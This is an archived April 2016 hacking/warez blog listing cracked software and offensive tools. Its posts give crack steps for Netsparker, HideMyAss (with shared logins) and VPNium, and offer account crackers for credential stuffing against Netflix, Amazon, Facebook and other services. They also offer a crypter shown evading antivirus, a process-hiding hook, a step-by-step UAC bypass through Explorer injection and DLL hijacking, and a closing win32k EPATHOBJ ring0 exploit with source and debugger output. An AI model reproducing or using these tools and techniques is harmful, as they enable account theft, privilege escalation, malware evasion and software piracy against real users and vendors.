Archive for April 2016

Sunday, April 24, 2016

Tenorshare iPhone Data Recovery 6.7.1.3+Keygen[DDL-UC]

8:09 AM Leave a Reply
Tenorshare iPhone Data Recovery 6.7.1.3+Keygen[DDL-UC]


Tenorshare iPhone Data Recovery — Quick, Safe and Complete Software for Recovering lost iPhone Data. Tenorshare iPhone Data Recovery is a life saver for those who lost iPhone data.

Tenorshare iPhone Data Recovery easily retrieve lost photos, contacts, SMS, notes, WhatsApp/Viber/Tango messages, call history, even App Data (Instagram, Viber, Flickr, iPhoto, iMovie, Kindle), etc in 16 types.

Features

Recover data directly from iPhone without backup files
Recover iPhone data from iTunes/iCloud backup
Extract, restore, backup data from iTunes backup files to computer
Print photos, contacts, messages, reminders, etc. off iPhone
Restore deleted iTunes backup and import iTunes backup manually
Backup/Transfer iPhone data to local computer
Support the newest iPhone 6/6 Plus, iPhone 5S/5C/5 and iOS 7.1/8/8.1


Key Features

Top 10 Reasons Why You Lost iPhone Data
Deleted data due to misoperation on iPhone.
New iOS update on your iPhone.
Factory settings or device reset
Jailbreaking your iPhone
iPhone got damaged, crashed, smashed
iPhone stuck in Apple logo, black/white screen of death, iPhone is inaccessible.
Virus attack your iPhone
iPhone is locked by a forgotten passcode
Replace iPhone battery
iTunes can't recognize your iPhone and can't restore from backup with iTunes

3 iPhone Recovery Ways Offered
iPhone Data Recovery without iTunes Backup — iOS Device Data Recovery
Recover data directly from iPhone 6/6 Plus, iPhone 5S/5C/5. No backup file needed. It is straightforward and easy.
iTunes Data Recovery — Restore iPhone Data from iTunes Backup
Extract iPhone data from previous backup file. No need to connect your iPhone to computer. It's especially useful when your iPhone is lost, stolen or seriously-damaged. Even if your iTunes backup is deleted or lost, you could still get back deleted iTunes backup and extract data.
Restore iPhone Data from iCloud Backup
Restore iPhone data from iCloud backup. It won't overwrite the current data existing on your iPhone. It ensures the data safety as you can download iCloud backup to local computer.

Recover Up to 16 Types of iPhone Files
Recover text Messages, WhatsApp/Tango messages, Contacts, Notes, Safari bookmark & history, Calendar, Reminder, and Call History.
Retrieve Photos(Photo Library, Photo Stream), Camera Roll, Videos, SMS Attachments, voice memos, App Data (Instagram, Viber, Flickr, iPhoto, iMovie, Kindle), Voicemail.

Preview Lost Files before iPhone Recovery
You can preview your data specific contents, time, name, etc. of your SMS, call history, etc. before recovery. All scanned files will be displayed in the preview window in category. Just click the file type and see the detailed information.
Recover iPhone contacts and recover them as vCard/VCF files.
iPhone Data Recovery Software can export and check your lost files in .txt, .xls, .xml,.jpg, .png etc.

Backup iPhone Data on Local Computer
iPhone Data Recovery allows you to transfer data from iOS devices to personal computer freely.
It also helps you extract data from unreadable iTunes backup file and save them on your local computer freely.

Sync Contents to iPhone
Sync videos, photos, text messages, contacts to iPhone.
Videos will be converted to iPhone-compatible format during the transfer.
All your files will be kept intact. No data loss.

Categories:

Netsparker V4.0.10 FULL CRACKED

8:07 AM 1 Comment
Netsparker V4.0.10 FULL CRACKED
Hello guys! So i found this ''tutorial'' on the internet.
And all the posts about Netsparker on LF is all FAKE.
Except this 1!
Step 1. Install Netsparker.
Step 2. It will say when it's done installing something with a license FILE. Choose the PROFESSIONAL.MSL.
Step 3. PUT MSL.Core.Scheme.dll IN THE DIRECTORY WHERE YOU INSTALLED NETSPARKER AND REPLACE IT.
Step 4. Profit =).
Step 4.5. Open it.
ENJOY!

Download
Categories:

RazorCrypt v2 -1.6.1 Cracked!

8:03 AM Leave a Reply
RazorCrypt v2 -1.6.1 Cracked!
[Info]
File Name: sample.exe
File Size: 1457664 Bytes
Md5 File: b1742b3a51d55e7c4297333a64bccbc8
Sha1 File: cff1f20e9ea19e58de7535d6433d0c55ed426ff1
Scan Date: Saturday, June 7th 2014 | 06:56:11
Status: Infected
Report by Level-23.cc
Result: 2/35

[Detections]
AVG Free-Clean
ArcaVir-Clean
Avast-Clean
AntiVir (Avira)-DR\/AutoIt.Gen2
BitDefender-Clean
Clam Antivirus-Clean
COMODO Internet Security-Clean
Dr.Web-Clean
eTrust-Vet-Clean
F-PROT Antivirus-Clean
F-Secure Internet Security-Clean
G Data-Clean
IKARUS Security-Clean
Kaspersky Antivirus-Clean
McAfee-Clean
MS Security Essentials-Clean
ESET NOD32-Clean
Norman-Clean
Norton Antivirus-Clean
Panda Security-Clean
A-Squared-Clean
Quick Heal Antivirus-Clean
Solo Antivirus-Clean
Sophos-Clean
Trend Micro Internet Security-Clean
VBA32 Antivirus-Clean
Zoner AntiVirus-Clean
Ad-Aware-Clean
BullGuard-Clean
FortiClient-Clean
K7 Ultimate-Clean
NANO Antivirus-Clean
Panda CommandLine-Clean
Twister Antivirus-Trojan.264FEF29B6FC0C72
VIPRE-Clean

Download
Categories:

Virtual WiFi-Virtual WiFi router v2.9.3 Portable[DDL-UC]

8:01 AM Leave a Reply
Virtual WiFi-Virtual WiFi router v2.9.3 Portable[DDL-UC]

Wireless technology is the most practical way to share internet access from a computer or to interconnect a wide variety of devices, such as computers, smartphones, tablets, smart TV's and many other types of devices which uses this kind of technology to create a connection used especially to transmit data to a central device or hub. The most important advantage of wireless technology for personal computers nowadays is that gives the possibility to connect a number of devices with no need to use special adaptors or cables.

Until a few years ago, in order to create a wireless network, also known as WiFi network, a physical router was required. Afterwards, the producers of wireless adapters had embedded the capability to create hosted wifi networks, and this fact lead to a wide connectivity not just between computers, but also between computers and other devices. The adapters that hosts the wifi network could therefore be seen as a virtual router.

Operating systems and software developers took use of this new feature, which is both hardware and software, and as a result there are many third party programs and internal interfaces for manage virtual wifi networks included directly in the operating systems - Windows has one and so does Linux.


Virtual Wifi features

Virtual WIFI is a program for Windows and has the main objective to create wifi hotspots hosted by the wireless adapter board (if the device supports this kind of operation). Using the program you can create two types of wifi networks:
Local wireless networks or ad-hoc hotspots, with the purpose to create a wireless network that connect a series of computers - for transferring files for one computer to another, for sharing a resource of a computer (for example for printer sharing) or to share access to services or programs on a computer (eg. creating and running a local game server with multiple players);
Wifi hotspots with internet access, used to share an existing internet connection with all computers, tablets or smartphones connected to the wireless network, for example it is possible to share a LAN (Local Area Network - accessed through cable) or USB modem internet connection.


How Virtual WiFi will share an internet connection.

The program can create and manage wifi hotspots of both types and show the devices connected, identified by IP and MAC address. Other features are:
Simple, fast and easy to use;
Available in English and Romanian;
The fastest internet connection can be automatically detected;
The resulting hotspot will be visible and accessible for all computers and mobile devices that has wireless capability;
The program can be use as a substitute for the internal GUI interface 'Create an ad hoc network' existing in Windows Vista and 7, but not in the further versions, such as windows 8, 8.1 and 10;
Once the hotspot is created the window of the application can be closed without halting the wifi network, the hotspot can be stopped either by relaunching the program and pressing the stop button or automatically at the system shutdown;
It is possible to auto assign the usage of a manual IP address if the Windows operating system is not configured to do that automatically.

Application usage guide

Bellow it is shown how to create a hotspot using the program Virtual Wifi, with a short introduction to available options.


To create a Wifi network you must first enter a hotspot name and a password, and then select the desired type of hotspot by selecting either the name of the internet connection you want to share or the option 'Without internet connection (ad-hoc)'. If there are multiple connections available then will be shown an option named 'Detect the fastest internet connection'. To start a WiFi network with the specified characteristics press the Start Wi-Fi button.


Platform:
Windows XP, Vista, 7, 8, 8.1 (32 / 64 bit)

Requirements:
- wireless adapter
- system administrator privileges


Categories:

Internet Download Menager IDA PRO 6.7

7:54 AM Leave a Reply
Internet Download Menager IDA PRO 6.7
This is a cracked version of IDA PRO 6.7

Yes I know IDA PRO 6.8 was out but this is all I got for now. I never saw a thread talking about IDA 6.7 so I decided to make one. (I did see a lot of threads about 6.6 though)

About:
IDA is a very well known professional Debugger, this is an interactive, programmable, extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X. IDA has become the de-facto standard for the analysis of hostile code, vulnerability research and COTS validation. See this executive overview for a summary of its features and uses. For all who cannot understand, I am trying to say that this thing can change and see the source code of some programs.

I've already used this to modify some APK files and this works like a charm!

Instructions:
1. Download
2. That's it ... seriously

Categories:

CyberGhost VPN

7:48 AM Leave a Reply
CyberGhost VPN
Just go open cheatengine, select the prcesss (cyberghost.exe) then enable speedhack and set it to 20 and click Ok or apply.

Then open up CyberGhost and just click enable protection and the free slot timer will be gone in no time.


first install cyberghost from , open cheatengine then click on the computer icon on top of the left hand side of cheat engine and browse cyberghost.exe and click open then on the right hand side you will see "Enable speedhack" check it and move the arrow towards right side to 20 or 50 and click apply ,once you done then you will see that your waiting time will be less than 5 seconds ..

Note :- Cheat engine is not a crack for cyberghost it only avoids the waiting time thats all !!


Cheat engine DL
CyberGhpst DL

Tutorial: http://imgur.com/a/uudFL
Categories:

HideMyAss VPN Pro Cracked by TT

7:46 AM 65 Comments
HideMyAss VPN Pro Cracked by TT


Cracked Hidemyass Pro VPN.
I am trying to let you guys up to date!
I hope you enjoy it.

Small note:
The emulator is a rewritten blackshades emulator.

Put this in your hosts file:
Path: C:\Windows\System32\drivers\etc\hosts

127.0.0.1 privax.com
127.0.0.1 auth.privax.com
127.0.0.1 vpn.hidemyass.com
127.0.0.1 hidemyass.com


If you change the logins, then i'll not post another one... Wink
Login User: Bruker80
Login Password: CrackedByTT


How to use:
1. Open the HMA! Pro VPN Emulator
2. Edit the hosts
3. Install HMA Pro VPN
4. Open HMA VPN and connect using the login credintials

Error Fixes:
If you get the error: "VPN Connection failed" close Hidemyass VPN over the taskmanager and start the Emulator as Admin.


Categories:

Multiforce Account Cracker

7:43 AM Leave a Reply
Multiforce Account Cracker

Step 1 :
Once you haved got all the requirements, Open up Multi-Force.

Step 2 :
Click "File", "Proxies" now load the proxys that you have that are WORKING into the program.

Step 3 :
Once you have added the proxies, You want to add accounts to multi-force, Click "Add" and select the combo list you downloaded/made/bought.

Step 4 :
Now Click "File", "Start" and now the program will start checking the accounts.

Questions :

Why cant i never get accounts?
Your combo list isnt good, Fresh/new or not used combo lists are better for cracking accounts.

It doesnt check accounts?
Then you will need better proxies, or working proxys. Below i will leave a link that will check your proxies for you to make sure they are working.

Where can i get good proxies for this?
Online, Purchase or get from other users.

Where can i get combolists?
Online, Purchase them from users on the site.

Download
Categories:

Account Cracker

7:42 AM Leave a Reply
Account Cracker
Netflix
Spotify
PSN
Twitter
DirectedTelevision
DeathByCaptcha
GameStop
Dell
CloudBet
Amazon
Amazon w/ DBC
Rhapsody
StrongVPN
Skype
StudyMode
WriteCheck
AddMeFast
Overstock
Lynda
Minecraft
ThinkGeek
Sony
MonoPrice
Staples
Armani
FaceBook
Instagram
PapaJohns
Tutor.com
HHonors
SteelSeries
Puzzle Pirates
Coke Rewards
Hotspot Shield
BTC Jam
Game Battles
etc...

Download
Categories:

VPNium 1.9.1 Premium Crack

7:15 AM Leave a Reply
VPNium 1.9.1 Premium Crack


Vpnium allows you to connect to the Internet using proxy servers located in different countries. This way you can protect your privacy and hide your real IP address and location. The program provides you also with some basic functionality, such as anonymous web surfing and mailing.In addition, it allows you to select the location of your fake IP address.

Features

256 – 2048 bit protection
Open-VPN technology
Browse anonymously
Browse without censorship
Browse securely

How to Crack ?

Download and install Latest VPNium Setup
Run the crack and click on Activate button
Now connect your internet
Viola !! It is now premium

Note :: This crack will work for any upcoming version of VPNium.

Download
Categories:

Saturday, April 23, 2016

[SRC / VID] UAC Bypass Win 8.1

1:10 PM Leave a Reply
[SRC / VID] UAC Bypass Win 8.1
The source code modifications to POC (GUI version without the direct use of the code, we can implement your own, there is not released) foreigners initially reported
This document contains a detailed description of the POC:
Initially released foreigner win7 UAC bypass URL is as follows:
hxxp://www.pretentiousname.com/misc/win7_uac_whitelist2.html

win8.1 Dll hijack that has been repaired, we now come to hijack another exe, windows exe can be hijacked several ...

BypassUac_Inject.cpp source code is more crucial to a file, in addition to some other file interprocess memory copy code is GUI-related code.

The POC program includes:

- GUI code (most of the code are UI-related code, you can write a command-line version)

- Error handling / reporting code (easy after the program error diagnostics)

- Cleanup code (after bypass UAC, clean up legacy in the system directory Dll)

- We can choose a different target process to inject (a process Explorer.exe is more appropriate, in addition Calc.exe, Notepad.exe, MSPaint.exe also can)

In fact, the code is not that complicated, really.

* Note *

- For 64-bit operating system compiled into 64 programs for 32-bit operating system compiled into 32 programs ...

- If you do not accidentally injected DLL 32 to 64 in the process went, into the process of the program may be Ben collapse, and vice versa ... so 32 pairs 32 operating system, 64 pairs of 64-bit operating system .. .

- You choose the target process may need to open ASLR (address randomization), if you turn off the EXE ASLR, then the target process will also require close ASLR. Essentially, Kernel32.dll loading process to address both the same, so the two processes handle on the address randomization consistently. System processes that can be used basically opened the ASLR, so the compiler option default. If you inject found during the collapse of the target process, and this time you can check the state of the process of Explorer ASLR.

- The code multi-process / multi-thread is unsafe (because black DLL may also be used, so you may need to add a mutex to prevent spurious DLL is detected deleted)

** Details use: **

The code use two vulnerabilities of the system. The first flaw comparative vulnerability, but also more difficult to repair. The second vulnerability DLL hijacking relatively easy to fix, it does not, win8.1 Mikocok will fix the dll that classic sysprep.exe hijacking.

Exploit 1 (general permission to copy files to the system directory without triggering pop interception):

1.1) we choose a Mikocok digital signature program, such as: Explorer.exe.
1.2) target remote thread injection process. (There is no god horse restrictions? We just need to choose the process with our main program in the same (Session) session, Explorer.exe is a good target process.)
1.3) was injected code to create a COM object IFileOperation. (If it is win7,8,8.1 default UAC option, and the target process is to have Mikocok copyright and digital signature program, it will not trigger the UAC prompt.)
1.4) was injected code IFileOperation interface using our black Dll files copied to the specified system
1.5) was injected code will start with a shield and is UAC whitelist program
1.6) was injected code with shields and is waiting to start UAC whitelist program is completed.
1.7) was injected code using IFileOperation interface delete black Dll.

Exploit 2 (System Dll hijacking):

BypassUacDll.dll is a very simple dynamic link library files, in the form of resource files to the main program BypassUac embedded inside.

We are looking for can Dll hijack the system program.

Note: We move / rename / replace the file under System32. You will find that if you were an ordinary privileges move / rename / replace, etc., it will pop prompt with administrator privileges to operate. So we need IFileOperation object mentioned above to help us to complete these operations.

How to find it can Dll hijack procedures, monitoring System32 process, you will find C: \ Windows \ sysprep.exe will System32 \ sysprep directory called cryptbase.dll default load a dynamic link library.

And this cryptbase.dll is located in the System32 directory below, currently there is no good way to replace it, but we can take advantage of a loophole to replicate a fake Dll to go sysprep directory, sysprep.exe default will load in the current directory cryptbase.dll, if you can not find it, only to find the System32 directory cryptbase.dll.

By injecting win8.1 sysprep.exe hijacking has expired, we use another program to C: \ Windows \ System32 \ migwiz \ migwiz.exe


Download
Categories:

[SRC] Hide Process x64 v2

1:09 PM Leave a Reply
[SRC] Hide Process x64 v2
-Static build size is about 8kb
-Now fully multithreaded
-Fixed some bugs
-It hooks itself again in a 1 sec intervall so unhooking doesn't affect as long as the thread is running
-You can compile for both x86 and x64 ( for x86 you will need to play with project settings am to lazy <3)

Recommend IDE: Visual Studio 2008 Proffesional + x64 Compiler Tools

Have a nice Day <3

Download
Categories:

Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit

1:08 PM Leave a Reply
Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")

#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the
// PATHREC object returned by win32k!EPATHOBJ::newpathrec doesn't initialise the
// next list pointer. The bug is really nice, but exploitation when
// allocations start failing is tricky.
//
// ; BOOL __thiscall EPATHOBJ::newpathrec(EPATHOBJ     *this,
//                                        PATHRECORD   **pppr,
//                                        ULONG         *pcMax,
//                                        ULONG cNeeded)
//  .text:BFA122CA                 mov     esi, [ebp+ppr]
//  .text:BFA122CD                 mov     eax, [esi+PATHRECORD.pprPrev]
//  .text:BFA122D0                 push    edi
//  .text:BFA122D1                 mov     edi, [ebp+pprNew]
//  .text:BFA122D4                 mov     [edi+PATHRECORD.pprPrev], eax
//  .text:BFA122D7                 lea     eax, [edi+PATHRECORD.count]
//  .text:BFA122DA                 xor     edx, edx
//  .text:BFA122DC                 mov     [eax], edx
//  .text:BFA122DE                 mov     ecx, [esi+PATHRECORD.flags]
//  .text:BFA122E1                 and     ecx, not (PD_BEZIER)
//  .text:BFA122E4                 mov     [edi+PATHRECORD.flags], ecx
//  .text:BFA122E7                 mov     [ebp+pprNewCountPtr], eax
//  .text:BFA122EA                 cmp     [edi+PATHRECORD.pprPrev], edx
//  .text:BFA122ED                 jnz     short loc_BFA122F7
//  .text:BFA122EF                 mov     ecx, [ebx+EPATHOBJ.ppath]
//  .text:BFA122F2                 mov     [ecx+PATHOBJ.pprfirst], edi
//
//  It turns out this mostly works because newpathrec() is backed by newpathalloc()
//  which uses PALLOCMEM(). PALLOCMEM() will always zero the buffer returned.
//
//  ; PVOID __stdcall PALLOCMEM(size_t size, int tag)
//  .text:BF9160D7                 xor     esi, esi
//  .text:BF9160DE                 push    esi
//  .text:BF9160DF                 push    esi
//  .text:BF9160E0                 push    [ebp+tag]
//  .text:BF9160E3                 push    [ebp+size]
//  .text:BF9160E6                 call    _HeavyAllocPool () 16 ; HeavyAllocPool(x,x,x,x)
//  .text:BF9160EB                 mov     esi, eax
//  .text:BF9160ED                 test    esi, esi
//  .text:BF9160EF                 jz      short loc_BF9160FF
//  .text:BF9160F1                 push    [ebp+size]      ; size_t
//  .text:BF9160F4                 push    0               ; int
//  .text:BF9160F6                 push    esi             ; void *
//  .text:BF9160F7                 call    _memset
//
//  However, the PATHALLOC allocator includes it's own freelist implementation, and
//  if that codepath can satisfy a request the memory isn't zeroed and returned
//  directly to the caller. This effectively means that we can add our own objects
//  to the PATHRECORD chain.
//
//  We can force this behaviour under memory pressure relatively easily, I just
//  spam HRGN objects until they start failing. This isn't super reliable, but it's
//  good enough for testing.
//
//          // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
//          // failure. Seriously, do some damn QA Microsoft, wtf.
//          for (Size = 1 << 26; Size; Size >>= 1) {
//              while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
//                  ;
//          }
//
//  Adding user controlled blocks to the freelist is a little trickier, but I've
//  found that flattening large lists of bezier curves added with PolyDraw() can
//  accomplish this reliably. The code to do this is something along the lines of:
//
//          for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
//              Points[PointNum].x      = 0x41414141 >> 4;
//              Points[PointNum].y      = 0x41414141 >> 4;
//              PointTypes[PointNum]    = PT_BEZIERTO;
//          }
//
//          for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
//              BeginPath(Device);
//              PolyDraw(Device, Points, PointTypes, PointNum);
//              EndPath(Device);
//              FlattenPath(Device);
//              FlattenPath(Device);
//              EndPath(Device);
//          }
//
//   We can verify this is working by putting a breakpoint after newpathrec, and
//   verifying the buffer is filled with recognisable values when it returns:
//
//   kd> u win32k!EPATHOBJ::pprFlattenRec+1E
//   win32k!EPATHOBJ::pprFlattenRec+0x1e:
//   95c922b8 e8acfbffff      call    win32k!EPATHOBJ::newpathrec (95c91e69)
//   95c922bd 83f801          cmp     eax,1
//   95c922c0 7407            je      win32k!EPATHOBJ::pprFlattenRec+0x2f (95c922c9)
//   95c922c2 33c0            xor     eax,eax
//   95c922c4 e944020000      jmp     win32k!EPATHOBJ::pprFlattenRec+0x273 (95c9250d)
//   95c922c9 56              push    esi
//   95c922ca 8b7508          mov     esi,dword ptr [ebp+8]
//   95c922cd 8b4604          mov     eax,dword ptr [esi+4]
//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+23 "dd poi(ebp-4) L1; gc"
//   kd> g
//   fe938fac  41414140
//   fe938fac  41414140
//   fe938fac  41414140
//   fe938fac  41414140
//   fe938fac  41414140
//
//   The breakpoint dumps the first dword of the returned buffer, which matches the
//   bezier points set with PolyDraw(). So convincing pprFlattenRec() to move
//   EPATHOBJ->records->head->next->next into userspace is no problem, and we can
//   easily break the list traversal in bFlattten():
//
//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
//   {
//     EPATHOBJ *pathobj; // esi () 1
//     PATHOBJ *ppath; // eax () 1
//     BOOL result; // eax () 2
//     PATHRECORD *ppr; // eax () 3
//
//     pathobj = this;
//     ppath = this->ppath;
//     if ( ppath )
//     {
//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
//       {
//         if ( ppr->flags & PD_BEZIER )
//         {
//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
//           if ( !ppr )
//             goto LABEL_2;
//         }
//       }
//       pathobj->fl &= 0xFFFFFFFE;
//       result = 1;
//     }
//     else
//     {
//   LABEL_2:
//       result = 0;
//     }
//     return result;
//   }
//
//   All we have to do is allocate our own PATHRECORD structure, and then spam
//   PolyDraw() with POINTFIX structures containing co-ordinates that are actually
//   pointers shifted right by 4 (for this reason the structure must be aligned so
//   the bits shifted out are all zero).
//
//   We can see this in action by putting a breakpoint in bFlatten when ppr has
//   moved into userspace:
//
//   kd> u win32k!EPATHOBJ::bFlatten
//   win32k!EPATHOBJ::bFlatten:
//   95c92517 8bff            mov     edi,edi
//   95c92519 56              push    esi
//   95c9251a 8bf1            mov     esi,ecx
//   95c9251c 8b4608          mov     eax,dword ptr [esi+8]
//   95c9251f 85c0            test    eax,eax
//   95c92521 7504            jne     win32k!EPATHOBJ::bFlatten+0x10 (95c92527)
//   95c92523 33c0            xor     eax,eax
//   95c92525 5e              pop     esi
//   kd> u
//   win32k!EPATHOBJ::bFlatten+0xf:
//   95c92526 c3              ret
//   95c92527 8b4014          mov     eax,dword ptr [eax+14h]
//   95c9252a eb14            jmp     win32k!EPATHOBJ::bFlatten+0x29 (95c92540)
//   95c9252c f6400810        test    byte ptr [eax+8],10h
//   95c92530 740c            je      win32k!EPATHOBJ::bFlatten+0x27 (95c9253e)
//   95c92532 50              push    eax
//   95c92533 8bce            mov     ecx,esi
//   95c92535 e860fdffff      call    win32k!EPATHOBJ::pprFlattenRec (95c9229a)
//
//   So at 95c9252c eax is ppr->next, and the routine checks for the PD_BEZIERS
//   flags (defined in winddi.h). Let's break if it's in userspace:
//
//   kd> ba e 1 95c9252c "j (eax < poi(nt!MmUserProbeAddress)) 'gc'; ''"
//   kd> g
//   95c9252c f6400810        test    byte ptr [eax+8],10h
//   kd> r
//   eax=41414140 ebx=95c1017e ecx=97330bec edx=00000001 esi=97330bec edi=0701062d
//   eip=95c9252c esp=97330be4 ebp=97330c28 iopl=0         nv up ei pl nz na po nc
//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
//   win32k!EPATHOBJ::bFlatten+0x15:
//   95c9252c f6400810        test    byte ptr [eax+8],10h       ds:0023:41414148=??
//
//   The question is how to turn that into code execution? It's obviously trivial to
//   call prFlattenRec with our userspace PATHRECORD..we can do that by setting
//   PD_BEZIER in our userspace PATHRECORD, but the early exit on allocation failure
//   poses a problem.
//
//   Let me demonstrate calling it with my own PATHRECORD:
//
//       // Create our PATHRECORD in userspace we will get added to the EPATHOBJ
//       // pathrecord chain.
//       PathRecord = VirtualAlloc(NULL,
//                                 sizeof(PATHRECORD),
//                                 MEM_COMMIT | MEM_RESERVE,
//                                 PAGE_EXECUTE_READWRITE);
//
//       // Initialise with recognisable debugging values.
//       FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);
//
//       PathRecord->next    = (PVOID)(0x41414141);
//       PathRecord->prev    = (PVOID)(0x42424242);
//
//       // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
//       // EPATHOBJ::bFlatten(), do that here.
//       PathRecord->flags   = PD_BEZIERS;
//
//       // Generate a large number of Bezier Curves made up of pointers to our
//       // PATHRECORD object.
//       for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
//           Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
//           Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
//           PointTypes[PointNum]    = PT_BEZIERTO;
//       }
//
//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+28 "j (dwo(ebp+8) < dwo(nt!MmUserProbeAddress)) ''; 'gc'"
//   kd> g
//   win32k!EPATHOBJ::pprFlattenRec+0x28:
//   95c922c2 33c0            xor     eax,eax
//   kd> dd ebp+8 L1
//   a3633be0  00130000
//
//   The ppr object is in userspace! If we peek at it:
//
//   kd> dd poi(ebp+8)
//   00130000  41414141 42424242 00000010 cccccccc
//   00130010  00000000 00000000 00000000 00000000
//   00130020  00000000 00000000 00000000 00000000
//   00130030  00000000 00000000 00000000 00000000
//   00130040  00000000 00000000 00000000 00000000
//   00130050  00000000 00000000 00000000 00000000
//   00130060  00000000 00000000 00000000 00000000
//   00130070  00000000 00000000 00000000 00000000
//
//   There's the next and prev pointer.
//
//   kd> kvn
//    # ChildEBP RetAddr  Args to Child
//   00 a3633bd8 95c9253a 00130000 002bfea0 95c101ce win32k!EPATHOBJ::pprFlattenRec+0x28 (FPO: [Non-Fpo])
//   01 a3633be4 95c101ce 00000001 00000294 fe763360 win32k!EPATHOBJ::bFlatten+0x23 (FPO: [0,0,4])
//   02 a3633c28 829ab173 0701062d 002bfea8 7721a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo])
//   03 a3633c28 7721a364 0701062d 002bfea8 7721a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ a3633c34)
//
//   The question is how to get PATHALLOC() to succeed under memory pressure so we
//   can make this exploitable? I'm quite proud of this list cycle trick,
//   here's how to turn it into an arbitrary write.
//
//   First, we create a watchdog thread that will patch the list atomically
//   when we're ready. This is needed because we can't exploit the bug while
//   HeavyAllocPool is failing, because of the early exit in pprFlattenRec:
//
//   .text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
//   .text:BFA122BD                 cmp     eax, 1               ; Check for failure
//   .text:BFA122C0                 jz      short continue
//   .text:BFA122C2                 xor     eax, eax             ; Exit early
//   .text:BFA122C4                 jmp     early_exit
//
//   So we create a list node like this:
//
//   PathRecord->Next    = PathRecord;
//   PathRecord->Flags   = 0;
//
//   Then EPATHOBJ::bFlatten() spins forever doing nothing:
//
//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
//   {
//       /* ... */
//
//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
//       {
//         if ( ppr->flags & PD_BEZIER )
//         {
//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
//         }
//       }
//
//       /* ... */
//   }
//
//   While it's spinning, we clean up in another thread, then patch the thread (we
//   can do this, because it's now in userspace) to trigger the exploit. The first
//   block of pprFlattenRec does something like this:
//
//       if ( pprNew->pprPrev )
//         pprNew->pprPrev->pprnext = pprNew;
//
//   Let's make that write to 0xCCCCCCCC.
//
//   DWORD WINAPI WatchdogThread(LPVOID Parameter)
//   {
//
//       // This routine waits for a mutex object to timeout, then patches the
//       // compromised linked list to point to an exploit. We need to do this.
//       LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p",
//                          GetCurrentThreadId(),
//                          Mutex);
//
//       if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
//           // It looks like the main thread is stuck in a call to FlattenPath(),
//           // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
//           // up, and then patch the list to trigger our exploit.
//           while (NumRegion--)
//               DeleteObject(Regions[NumRegion]);
//
//           LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord);
//
//           InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
//
//       } else {
//           LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
//       }
//
//       return 0;
//   }
//
//       PathRecord->next    = PathRecord;
//       PathRecord->prev    = (PVOID)(0x42424242);
//       PathRecord->flags   = 0;
//
//       ExploitRecord.next  = NULL;
//       ExploitRecord.prev  = 0xCCCCCCCC;
//       ExploitRecord.flags = PD_BEZIERS;
//
//   Here's the output on Windows 8:
//
//   kd> g
//   *******************************************************************************
//   *                                                                             *
//   *                        Bugcheck Analysis                                    *
//   *                                                                             *
//   *******************************************************************************
//
//   Use !analyze -v to get detailed debugging information.
//
//   BugCheck 50, {cccccccc, 1, 8f18972e, 2}
//   *** WARNING: Unable to verify checksum for ComplexPath.exe
//   *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
//   Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )
//
//   Followup: MachineOwner
//   ---------
//
//   nt!RtlpBreakWithStatusInstruction:
//   810f46f4 cc              int     3
//   kd> kv
//   ChildEBP RetAddr  Args to Child
//   a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
//   a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
//   a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
//   a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
//   a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
